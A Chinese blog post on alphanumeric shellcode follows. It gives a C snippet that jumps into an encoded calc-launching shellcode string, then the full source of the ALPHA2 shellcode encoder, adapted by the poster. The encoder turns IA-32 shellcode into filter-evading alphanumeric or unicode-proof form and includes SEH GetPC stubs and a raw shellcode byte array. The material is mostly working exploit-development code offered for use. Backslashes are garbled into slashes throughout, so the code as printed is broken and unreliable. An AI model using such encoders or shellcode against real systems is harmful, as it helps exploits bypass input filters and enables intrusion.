纯字符数字的shllcode及Alpha2.c使用
梧桐雨发表于 2017-03-29 09:41:04
#include <stdio.h>
#include <windows.h>
//纯字符数字的shellcode,显示个calc
char aphal1[]={"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkVvqKRJ31PXrsOKtMFEk6cL9oKcFQIPPPmkFrHKNaQlYoXSjHIu9oyokOsSu1RLasfNQuPxPegps0A"};
int main(int argc, char **argv)
{
__asm
{
lea esp,aphal1
jmp esp
}
return 0;上面是一个纯数字字母的shllcode,运行一个calc.exe程序
shllcode的(纯字符数字)编码主要是base16和Alpha2里面的
// Alpha2.cpp : Defines the entry point for the console application.
//
#include <stdio.h> // printf(), fprintf(), stderr
#include <stdlib.h> // exit(), EXIT_SUCCESS, EXIT_FAILURE, srand(), rand()
#include <string.h> // strcasecmp(), strstr()
#include <time.h> //struct timeval, struct timezone, gettimeofday()
#include <winsock.h>
#define VERSION_STRING "ALPHA 2: Zero-tolerance. (build 07)"
#define COPYRIGHT "Copyright (C) 2003, 2004 by Berend-Jan Wever."
/*
________________________________________________________________________________
,sSSs,,s, ,sSSSs, ALPHA 2: Zero-tolerance.
SS" Y$P" SY" ,SY
iS' dY ,sS" Unicode-proof uppercase alphanumeric shellcode encoding.
YS, dSb ,sY" Copyright (C) 2003, 2004 by Berend-Jan Wever.
`"YSS'"S' 'SSSSSSSP <skylined@edup.tudelft.nl>
________________________________________________________________________________
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License version 2, 1991 as published by
the Free Software Foundation.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
A copy of the GNU General Public License can be found at:
http://www.gnu.org/licenses/gpl.html
or you can write to:
Free Software Foundation, Inc.
59 Temple Place - Suite 330
Boston, MA 02111-1307
USA.
Acknowledgements:
Thanks to rix for his phrack article on aphanumeric shellcode.
Thanks to obscou for his phrack article on unicode-proof shellcode.
Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.
*/
#define mixedcase_w32sehgetpc "VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36" /
"FFFFTXVj0PPTUPPa301089"
#define uppercase_w32sehgetpc "VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYY" /
"P5YYYD5KKYAPTTX638TDDNVDDX4Z4A638618" /
"16"
#define mixedcase_ascii_decoder_body "jAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
#define uppercase_ascii_decoder_body "VTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0B" /
"BXP8ACJJI"
#define mixedcase_unicode_decoder_body "jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIA" /
"IAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA" /
"ZBABABABABkMAGB9u4JB"
#define uppercase_unicode_decoder_body "QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5" /
"AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABAB" /
"QI1AIQIAIQI1111AIAJQI1AYAZBABABABAB3" /
"0APB944JB"
struct decoder {
char* id; // id of option
char* code; // the decoder
} mixedcase_ascii_decoders[] = {
{ "nops", "IIIIIIIIIIIIIIIIII7" mixedcase_ascii_decoder_body },
{ "eax", "PYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "ecx", "IIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "edx", "JJJJJJJJJJJJJJJJJ7RY" mixedcase_ascii_decoder_body },
{ "ebx", "SYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "esp", "TYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "ebp", "UYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "esi", "VYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "edi", "WYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp-10]", "LLLLLLLLLLLLLLLLYIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp-C]", "LLLLLLLLLLLLYIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp-8]", "LLLLLLLLYIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp-4]", "LLLL7YIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp]", "YIIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+4]", "YYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp+8]", "YYYIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+C]", "YYYYIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp+10]", "YYYYYIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+14]", "YYYYYYIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp+18]", "YYYYYYYIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+1C]", "YYYYYYYYIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "seh", mixedcase_w32sehgetpc "IIIIIIIIIIIIIIIII7QZ" // ecx code
mixedcase_ascii_decoder_body },
{ NULL, NULL }
}, uppercase_ascii_decoders[] = {
{ "nops", "IIIIIIIIIIII" uppercase_ascii_decoder_body },
{ "eax", "PYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "ecx", "IIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "edx", "JJJJJJJJJJJRY" uppercase_ascii_decoder_body },
{ "ebx", "SYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "esp", "TYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "ebp", "UYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "esi", "VYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "edi", "WYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp-10]", "LLLLLLLLLLLLLLLLYII7QZ" uppercase_ascii_decoder_body },
{ "[esp-C]", "LLLLLLLLLLLLYIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp-8]", "LLLLLLLLYIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp-4]", "LLLL7YIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp]", "YIIIIIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp+4]", "YYIIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp+8]", "YYYIIIIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp+C]", "YYYYIIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp+10]", "YYYYYIIIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp+14]", "YYYYYYIIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "[esp+18]", "YYYYYYYIIIIIII7QZ" uppercase_ascii_decoder_body },
{ "[esp+1C]", "YYYYYYYYIIIIIIIQZ" uppercase_ascii_decoder_body },
{ "seh", uppercase_w32sehgetpc "IIIIIIIIIIIQZ" // ecx code
uppercase_ascii_decoder_body },
{ NULL, NULL }
}, mixedcase_ascii_nocompress_decoders[] = {
{ "nops", "7777777777777777777777777777777777777" mixedcase_ascii_decoder_body },
{ "eax", "PY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "ecx", "77777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "edx", "77777777777777777777777777777777777RY" mixedcase_ascii_decoder_body },
{ "ebx", "SY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "esp", "TY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "ebp", "UY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "esi", "VY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "edi", "WY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp-10]", "LLLLLLLLLLLLLLLLY777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp-C]", "LLLLLLLLLLLLY7777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp-8]", "LLLLLLLLY77777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp-4]", "LLLL7Y77777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp]", "Y7777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+4]", "YY777777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+8]", "YYY77777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+C]", "YYYY7777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+10]", "YYYYY777777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+14]", "YYYYYY77777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+18]", "YYYYYYY7777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "[esp+1C]", "YYYYYYYY777777777777777777777777777QZ" mixedcase_ascii_decoder_body },
{ "seh", mixedcase_w32sehgetpc "77777777777777777777777777777777777QZ" // ecx code
mixedcase_ascii_decoder_body },
{ NULL, NULL }
}, uppercase_ascii_nocompress_decoders[] = {
{ "nops", "777777777777777777777777" uppercase_ascii_decoder_body },
{ "eax", "PY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "ecx", "7777777777777777777777QZ" uppercase_ascii_decoder_body },
{ "edx", "7777777777777777777777RY" uppercase_ascii_decoder_body },
{ "ebx", "SY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "esp", "TY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "ebp", "UY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "esi", "VY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "edi", "WY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp-10]", "LLLLLLLLLLLLLLLLY77777QZ" uppercase_ascii_decoder_body },
{ "[esp-C]", "LLLLLLLLLLLLY777777777QZ" uppercase_ascii_decoder_body },
{ "[esp-8]", "LLLLLLLLY7777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp-4]", "LLLL7Y7777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp]", "Y777777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+4]", "YY77777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+8]", "YYY7777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+C]", "YYYY777777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+10]", "YYYYY77777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+14]", "YYYYYY7777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+18]", "YYYYYYY777777777777777QZ" uppercase_ascii_decoder_body },
{ "[esp+1C]", "YYYYYYYY77777777777777QZ" uppercase_ascii_decoder_body },
{ "seh", uppercase_w32sehgetpc "7777777777777777777777QZ" // ecx code
uppercase_ascii_decoder_body },
{ NULL, NULL }
}, mixedcase_unicode_decoders[] = {
{ "nops", "IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444" mixedcase_unicode_decoder_body },
{ "eax", "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "ecx", "IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444" mixedcase_unicode_decoder_body },
{ "edx", "RRYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "ebx", "SSYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "esp", "TUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "ebp", "UUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "esi", "VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "edi", "WWYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ "[esp]", "YAIAIAIAIAIAIAIAIAIAIAIAIAIAIA44" mixedcase_unicode_decoder_body },
{ "[esp+4]", "YUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" mixedcase_unicode_decoder_body },
{ NULL, NULL }
}, uppercase_unicode_decoders[] = {
{ "nops", "IAIAIAIA4444" uppercase_unicode_decoder_body },
{ "eax", "PPYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "ecx", "IAIAIAIA4444" uppercase_unicode_decoder_body },
{ "edx", "RRYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "ebx", "SSYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "esp", "TUYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "ebp", "UUYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "esi", "VVYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "edi", "WWYAIAIAIAIA" uppercase_unicode_decoder_body },
{ "[esp]", "YAIAIAIAIA44" uppercase_unicode_decoder_body },
{ "[esp+4]", "YUYAIAIAIAIA" uppercase_unicode_decoder_body },
{ NULL, NULL }
}, mixedcase_unicode_nocompress_decoders[] = {
{ "nops", "444444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "eax", "PPYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "ecx", "444444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "edx", "RRYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "ebx", "SSYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "esp", "TUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "ebp", "UUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "esi", "VVYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "edi", "WWYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "[esp]", "YA4444444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ "[esp+4]", "YUYA44444444444444444444444444444444444" mixedcase_unicode_decoder_body },
{ NULL, NULL }
}, uppercase_unicode_nocompress_decoders[] = {
{ "nops", "44444444444444" uppercase_unicode_decoder_body },
{ "eax", "PPYA4444444444" uppercase_unicode_decoder_body },
{ "ecx", "44444444444444" uppercase_unicode_decoder_body },
{ "edx", "RRYA4444444444" uppercase_unicode_decoder_body },
{ "ebx", "SSYA4444444444" uppercase_unicode_decoder_body },
{ "esp", "TUYA4444444444" uppercase_unicode_decoder_body },
{ "ebp", "UUYA4444444444" uppercase_unicode_decoder_body },
{ "esi", "VVYA4444444444" uppercase_unicode_decoder_body },
{ "edi", "WWYA4444444444" uppercase_unicode_decoder_body },
{ "[esp]", "YA444444444444" uppercase_unicode_decoder_body },
{ "[esp+4]", "YUYA4444444444" uppercase_unicode_decoder_body },
{ NULL, NULL }
};
struct decoder* decoders[] = {
mixedcase_ascii_decoders, uppercase_ascii_decoders,
mixedcase_unicode_decoders, uppercase_unicode_decoders,
mixedcase_ascii_nocompress_decoders, uppercase_ascii_nocompress_decoders,
mixedcase_unicode_nocompress_decoders, uppercase_unicode_nocompress_decoders
};
char evil[] =
"/xeb/x16/x5b/x6a/x01/x58/x53/xbb/x0d/x25/x86/x7c/xff/xd3/x31/xc0"
"/x50/xbb/x12/xcb/x81/x7c/xff/xd3/xe8/xe5/xff/xff/xff/x63/x61/x6c"
"/x63/x2e/x65/x78/x65/x00";
void version(void) {
printf(
"________________________________________________________________________________/n"
"/n"
" ,sSSs,,s, ,sSSSs, " VERSION_STRING "/n"
" SS/" Y$P/" SY/" ,SY /n"
" iS' dY ,sS/" Unicode-proof uppercase alphanumeric shellcode encoding./n"
" YS, dSb ,sY/" " COPYRIGHT "/n"
" `/"YSS'/"S' 'SSSSSSSP <skylined@edup.tudelft.nl>/n"
"________________________________________________________________________________/n"
"/n"
);
exit(EXIT_SUCCESS);
}
void help(char* name)
{
printf(
"Usage: %s [OPTION] [BASEADDRESS]/n"
"ALPHA 2 encodes your IA-32 shellcode to contain only alphanumeric characters./n"
"The result can optionaly be uppercase-only and/or unicode proof. It is a encoded/n"
"version of your origional shellcode. It consists of baseaddress-code with some/n"
"padding, a decoder routine and the encoded origional shellcode. This will work/n"
"for any target OS. The resulting shellcode needs to have RWE-access to modify/n"
"it's own code and decode the origional shellcode in memory./n"
"/n"
"BASEADDRESS/n"
" The decoder routine needs have it's baseaddress in specified register(s). The/n"
" baseaddress-code copies the baseaddress from the given register or stack/n"
" location into the apropriate registers./n"
"eax, ecx, edx, ecx, esp, ebp, esi, edi/n"
" Take the baseaddress from the given register. (Unicode baseaddress code using/n"
" esp will overwrite the byte of memory pointed to by ebp!)/n"
"[esp], [esp-X], [esp+X]/n"
" Take the baseaddress from the stack./n"
"seh/n"
" The windows /"Structured Exception Handler/" (seh) can be used to calculate/n"
" the baseaddress automatically on win32 systems. This option is not available/n"
" for unicode-proof shellcodes and the uppercase version isn't 100%% reliable./n"
"nops/n"
" No baseaddress-code, just padding. If you need to get the baseaddress from a/n"
" source not on the list use this option (combined with --nocompress) and/n"
" replace the nops with your own code. The ascii decoder needs the baseaddress/n"
" in registers ecx and edx, the unicode-proof decoder only in ecx./n"
"-n/n"
" Do not output a trailing newline after the shellcode./n"
"--nocompress/n"
" The baseaddress-code uses /"dec/"-instructions to lower the required padding/n"
" length. The unicode-proof code will overwrite some bytes in front of the/n"
" shellcode as a result. Use this option if you do not want the /"dec/"-s./n"
"--unicode/n"
" Make shellcode unicode-proof. This means it will only work when it gets/n"
" converted to unicode (inserting a '0' after each byte) before it gets/n"
" executed./n"
"--uppercase/n"
" Make shellcode 100%% uppercase characters, uses a few more bytes then/n"
" mixedcase shellcodes./n"
"--sources/n"
" Output a list of BASEADDRESS options for the given combination of --uppercase/n"
" and --unicode./n"
"--help/n"
" Display this help and exit/n"
"--version/n"
" Output version information and exit/n"
"/n"
"See the source-files for further details and copying conditions. There is NO/n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE./n"
"/n"
"Acknowledgements:/n"
" Thanks to rix for his phrack article on aphanumeric shellcode./n"
" Thanks to obscou for his phrack article on unicode-proof shellcode./n"
" Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code./n"
"/n"
"Report bugs to <skylined@edup.tudelft.nl>/n",
name
);
exit(EXIT_SUCCESS);
}
//-----------------------------------------------------------------------------
int main(int argc, char* argv[], char* envp[])
{
int uppercase = 0, unicode = 0, sources = 0, w32sehgetpc = 0,
nonewline = 0, nocompress = 0, options = 0, spaces = 0;
char* baseaddress = NULL;
int i, input, A, B, C, D, E, F;
char* valid_chars;
// Random seed
//struct timeval tv;
//struct timezone tz;
//ttimeofday(&tv, &tz);
//srand((int)tv.tv_sec*1000+tv.tv_usec);
// Scan all the options and set internal variables accordingly
for (i=1; i<argc; i++)
{
if (strcmp(argv[i], "--help") == 0) help(argv[0]);
else if (strcmp(argv[i], "--version") == 0) version();
else if (strcmp(argv[i], "--uppercase") == 0) uppercase = 1;
else if (strcmp(argv[i], "--unicode") == 0) unicode = 1;
else if (strcmp(argv[i], "--nocompress") == 0) nocompress = 1;
else if (strcmp(argv[i], "--sources") == 0) sources = 1;
else if (strcmp(argv[i], "--spaces") == 0) spaces = 1;
else if (strcmp(argv[i], "-n") == 0) nonewline = 1;
else if (baseaddress == NULL) baseaddress = argv[i];
else
{
fprintf(stderr, "%s: more then one BASEADDRESS option: `%s' and `%s'/n"
"Try `%s --help' for more information./n",
argv[0], baseaddress, argv[i], argv[0]);
exit(EXIT_FAILURE);
}
}
// No baseaddress option ?
if (baseaddress == NULL)
{
fprintf(stderr, "%s: missing BASEADDRESS options./n"
"Try `%s --help' for more information./n", argv[0], argv[0]);
exit(EXIT_FAILURE);
}
// The uppercase, unicode and nocompress option determine which decoder we'll
// need to use. For each combination of these options there is an array,
// indexed by the baseaddress with decoders. Pointers to these arrays have
// been put in another array, we can calculate the index into this second
// array like this:
options = uppercase+unicode*2+nocompress*4;
// decoders[options] will now point to an array of decoders for the specified
// options. The array contains one decoder for every possible baseaddress.
// Someone wants to know which baseaddress options the specified options
// for uppercase, unicode and/or nocompress allow:
if (sources)
{
printf("Available options for %s%s alphanumeric shellcode:/n",
uppercase ? "uppercase" : "mixedcase",
unicode ? " unicode-proof" : "");
for (i=0; decoders[options][i].id != NULL; i++)
{
printf(" %s/n", decoders[options][i].id);
}
printf("/n");
exit(EXIT_SUCCESS);
}
//TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI
if (uppercase)
{
if (spaces) valid_chars = " 0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ";
else valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ";
} else
{
if (spaces) valid_chars = " 0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
else valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
}
// Find and output decoder
for (i=0; stricmp(baseaddress, decoders[options][i].id) != 0; i++)
{
if (decoders[options][i+1].id == NULL)
{
fprintf(stderr, "%s: unrecognized baseaddress option `%s'/n"
"Try `%s %s%s--sources' for a list of BASEADDRESS options./n",
argv[0], baseaddress, argv[0],
uppercase ? "--uppercase " : "",
unicode ? "--unicode " : "");
exit(EXIT_FAILURE);
}
}
printf("%s", decoders[options][i].code);
// system("pause");
// read, encode and output shellcode
for (int j=0;j<sizeof(evil);j++)//evil你自己的shllcode,用的话需修改源码
{
input=evil[j];
// encoding AB -> CD 00 EF 00
A = (input & 0xf0) >> 4;
B = (input & 0x0f);
F = B;
// E is arbitrary as long as EF is a valid character
i = rand() % strlen(valid_chars);
while ((valid_chars[i] & 0x0f) != F) { i = ++i % strlen(valid_chars); }
E = valid_chars[i] >> 4;
// normal code uses xor, unicode-proof uses ADD.
// AB ->
D = unicode ? (A-E) & 0x0f : (A^E);
// C is arbitrary as long as CD is a valid character
i = rand() % strlen(valid_chars);
while ((valid_chars[i] & 0x0f) != D) { i = ++i % strlen(valid_chars); }
C = valid_chars[i] >> 4;
printf("%c%c", (C<<4)+D, (E<<4)+F);
}
//最后显示出的一串字符就是编码后的shellcode
//可以这样使用命令行下:alpha2 esp
//esp指向了shellcode
printf("A%s", nonewline ? "" : "/n"); // Terminating "A"
exit(EXIT_SUCCESS);
}
源Appha2地址是:
http://skypher.com/wiki/index.php/ALPHA2
纯字符数字的shellcode在某些场合下是特别有用的,这个Alpha2本来是linux下的源码,稍微改了下.
【via@instruder-爱杀之爪的矩阵】